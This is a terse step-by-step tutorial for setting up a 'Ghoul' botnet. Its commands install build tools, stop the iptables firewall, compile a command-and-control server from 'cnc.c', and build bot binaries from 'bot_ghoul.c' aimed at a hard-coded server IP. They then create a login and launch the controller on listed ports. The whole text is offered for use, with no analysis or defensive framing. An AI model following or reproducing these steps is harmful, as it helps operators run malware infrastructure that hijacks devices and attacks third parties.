Tut Made My @uogp_
----------------------------
Put server Ip in bot_ghoul.c						 
--------------------------------------------------------------------
yum install python-paramiko nano screen gcc perl wget lbzip unzip -y
--------------------------------------------------------------------
service httpd restart 
service iptables stop
--------------------------------------------------------------------
gcc cnc.c -o server -pthread
--------------------------------------------------------------------
python Ghoul.py bot_ghoul.c 157.245.187.85  (Server IP)
--------------------------------------------------------------------
echo uogp uogp >>User_Info.txt
------------------------------
screen ./server 1111 1 23
------------------------------
If Doesn't Screen
------------------------------
yum install screen
------------------------------
pkill screen
------------------------------
screen ./server 1111 1 23